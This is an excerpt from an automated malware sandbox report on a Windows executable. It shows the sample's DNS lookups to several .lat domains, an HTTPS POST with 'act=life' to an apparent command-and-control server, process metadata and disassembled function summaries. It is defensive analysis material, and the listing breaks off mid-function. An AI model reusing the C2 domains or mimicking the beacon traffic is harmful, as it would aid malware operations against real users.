Dec 20, 2024 16:31:19.652395010 CET	52460	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:31:19.790406942 CET	53	52460	1.1.1.1	192.168.2.5
Dec 20, 2024 16:31:19.792614937 CET	59799	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:31:19.931834936 CET	53	59799	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 16:31:19.425607920 CET	192.168.2.5	1.1.1.1	0x303f	Standard query (0)	sweepyribs.lat	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:31:19.652395010 CET	192.168.2.5	1.1.1.1	0x4929	Standard query (0)	grannyejh.lat	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:31:19.792614937 CET	192.168.2.5	1.1.1.1	0x9cae	Standard query (0)	discokeyus.lat	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 16:31:19.647887945 CET	1.1.1.1	192.168.2.5	0x303f	Name error (3)	sweepyribs.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:31:19.790406942 CET	1.1.1.1	192.168.2.5	0x4929	Name error (3)	grannyejh.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:31:19.931834936 CET	1.1.1.1	192.168.2.5	0x9cae	No error (0)	discokeyus.lat		104.21.21.99	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:31:19.931834936 CET	1.1.1.1	192.168.2.5	0x9cae	No error (0)	discokeyus.lat		172.67.197.170	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discokeyus.lat

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.21.99	443	4712	C:\Users\user\Desktop\gEfWplq0xQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 15:31:21 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: discokeyus.lat
2024-12-20 15:31:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-20 15:31:21 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:31:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i8bcea3fondop417dvi26edgo3; expires=Tue, 15 Apr 2025 09:18:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFGc0LXwiphMFw9fqVnjf129ahamrPSYH7S8xjmxTCcbBMSFiGWAX357u6RE%2BYDR5CoT%2B7ZrWrGAkxCedwWMKlZtKoOlzvIStXXzFHiAWXc7n0L8cLJ1hpE3aFwRvUymog%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f50adcb5e810f79-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1598&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1593016&cwnd=241&unsent_bytes=0&cid=1d594d144564f84c&ts=776&x=0"
2024-12-20 15:31:21 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-20 15:31:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:31:17
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\gEfWplq0xQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\gEfWplq0xQ.exe"
Imagebase:	0x570000
File size:	1'844'224 bytes
MD5 hash:	414752CE11385194A5232F820B8480EA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.8%
Total number of Nodes:	47
Total number of Limit Nodes:	3

Executed Functions

Function 00578850 Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00578AD2

Part of subcall function 0057C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0057C564

Part of subcall function 0057B390: FreeLibrary.KERNEL32(00578AB8), ref: 0057B396
Part of subcall function 0057B390: FreeLibrary.KERNEL32 ref: 0057B3B7

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: FreeLibrary$ExitInitializeProcess
String ID:
API String ID: 3534244204-0
Opcode ID: 45ef24f50153739bc22fbb631c66d93fa505864e0c1108102c6fbcceb3ef92de
Instruction ID: 12c88478c02c3d20314b58ec699b452a90151b4b94a3770d0daa74a1f25c7b89
Opcode Fuzzy Hash: 45ef24f50153739bc22fbb631c66d93fa505864e0c1108102c6fbcceb3ef92de
Instruction Fuzzy Hash: A451B6B7F502180BD71CAAA99C5A7AA78879BC5720F1FC13D5948DB3C6EDB48C0592C1

Function 005AC1F0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(005AE31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 005AC21E

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 005AC767 Relevance: 1.3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,+*), xrefs: 005AC790

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: 0752dee14be96a90629c079bcf3fdf1df41f55c4a550306edc7acf24aa16ed83
Instruction ID: fef53b3a5261c9aa4e60143421d00143f5db1f4a5d03661c2b9483c8062036fc
Opcode Fuzzy Hash: 0752dee14be96a90629c079bcf3fdf1df41f55c4a550306edc7acf24aa16ed83
Instruction Fuzzy Hash: 8931A535B402159BDB14CF5CCC95BBEBBB2BB89300F249528D502A73D1CB75AC05C754

Function 0057B70C Relevance: 1.3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

o`, xrefs: 0057B74B

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 997236c4ff18c0cf93a2a73a112be5e846c42a3275e5fe3145d16b5998f68908
Instruction ID: e0013aed372743878969ef2dff7f34ee419704e96f41537c02294ced606861a9
Opcode Fuzzy Hash: 997236c4ff18c0cf93a2a73a112be5e846c42a3275e5fe3145d16b5998f68908
Instruction Fuzzy Hash: B2110E70208380AFC3048F65DDC1B6ABFE2EBD2204F64983DE184AB261C635E848AB15

Function 0057C550 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0057C564

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: d7b76c95ca1bcf5ea32fefb023a5331c29ee96a8c64e461234baaf14cc2dfd7b
Instruction ID: ebf18db20885c33c66a7dc1409906c78efffe82fa0c7a6be810066d4e0885362
Opcode Fuzzy Hash: d7b76c95ca1bcf5ea32fefb023a5331c29ee96a8c64e461234baaf14cc2dfd7b
Instruction Fuzzy Hash: 24D0A72119064827D344AA199C4BF32731C8B827E4F40171DE2A2E62C1D9807A29D565

Function 0057C583 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0057C596

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 1e85e73fa5cd563b541bd10940593ccdd63422886170c691a932f81c9591bbb4
Instruction ID: 922815dff8b909efb3ecc45486d134165c1044916a27583994fc67ea29ef8573
Opcode Fuzzy Hash: 1e85e73fa5cd563b541bd10940593ccdd63422886170c691a932f81c9591bbb4
Instruction Fuzzy Hash: 8ED0CA313E93027AF6788A18AC63F2422009702F64F342B08B3A2FE3D0C8E1B205960C

Function 005AAAA0 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,005AC1D6,?,0057B2E4,00000000,00000001), ref: 005AAABE

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2f4b734a1e54e1c1e500318aff67b8104c80b5473cee2d349edddb3ae2abbf32
Instruction ID: 26da3207219c8045fe6062a9c1c54aa7f20ea78a01ea697697930ea74e2fa45a
Opcode Fuzzy Hash: 2f4b734a1e54e1c1e500318aff67b8104c80b5473cee2d349edddb3ae2abbf32
Instruction Fuzzy Hash: 96D01231545523EFC6102F24FC0AB8A3AA8EF5A760F0748A1B4006B1B1C765EC94D6D4

Function 005AAA80 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,005AC1C0), ref: 005AAA90

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7952b1ebb13e9f5610a630796f760376dcc118d999dcf72a468e52744faa3428
Instruction ID: a7f247263b107683427184274aebbc1453c3043cd4b00e0ccfd431fbdd2e5513
Opcode Fuzzy Hash: 7952b1ebb13e9f5610a630796f760376dcc118d999dcf72a468e52744faa3428
Instruction Fuzzy Hash: D2C09B31045521AFC6113B15FC09FCA3F64EF56761F054451F50567072C7656C95D6D4

Function 005C87B5 Relevance: 1.3, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 005C8B58

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 760b7809bb1b0ff2e48ed23fdc470e54f51e029502259e3d847b04f57c7c8777
Instruction ID: b664633f4e89af5ab7c9974738e57352304a398c5b706eba5529c689d703e1ba
Opcode Fuzzy Hash: 760b7809bb1b0ff2e48ed23fdc470e54f51e029502259e3d847b04f57c7c8777
Instruction Fuzzy Hash: 9DF05EF5A4C2088FC704AF68D44476D7BE0FF95711F24093CE996C2780EA319C60CB46

Function 005C82ED Relevance: 1.3, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 005C82ED

Memory Dump Source

Source File: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c0651781e074d4a79c73c1b8521b6dd7f0ba92010552ae0980f14a0ec7f0e33
Instruction ID: 854a858e941a306cbdf12a5d83fd48fd5e1d2e3b76a12ef5b0a567948627a5af
Opcode Fuzzy Hash: 3c0651781e074d4a79c73c1b8521b6dd7f0ba92010552ae0980f14a0ec7f0e33
Instruction Fuzzy Hash: 63E086F2A0451DEFD7009E7494087B97E94D745295F118939D982D6744D971CC15C781

Function 0057E71B Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 0057E720

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195399869.00000000005C2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.00000000005C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000074C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195420530.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195758962.0000000000867000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195900881.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195918409.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_570000_gEfWplq0xQ.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 84bd712371e056b4b282f27fd9680e92dba1e7e94457386ddccffee814ca0046
Instruction ID: 0fed93aa4f8402cbf918252d9f8f71040ddb28d52eb2ccdb210fd02932f33c35
Opcode Fuzzy Hash: 84bd712371e056b4b282f27fd9680e92dba1e7e94457386ddccffee814ca0046
Instruction Fuzzy Hash: 8CC0927228AA829BE3888B38DE578267639A7161583023B28D213F3378CD61B504991C

Non-executed Functions

Function 005941C0 Relevance: 24.8, Strings: 19, Instructions: 1025COMMON

Download Yara Rule

Strings

:JL, xrefs: 00594BF5
)Z*\, xrefs: 00594828
#f!x, xrefs: 00594BC3
pIrK, xrefs: 00594560
6T, xrefs: 00594D0A
o#M%, xrefs: 005948C6
7, xrefs: 00594D00
-^+P, xrefs: 00594832
VaUc, xrefs: 0059459C
$%, xrefs: 00594257
8JL, xrefs: 00594800
5F6X, xrefs: 00594C13
=_%A, xrefs: 0059490C
?z=|, xrefs: 005947D8
<[5], xrefs: 00594902
)Z/\, xrefs: 00594C1D
A/6Q, xrefs: 005948E4
%y, xrefs: 00594D14
>N@, xrefs: 0059480A

Memory Dump Source

Source File: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp, Offset: 00570000, based on PE: true

Associated: 00000000.00000002.2195321997.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2195343692.00000000005B3000.00000040.00000001.01000000.00000003.sdmpDownload File
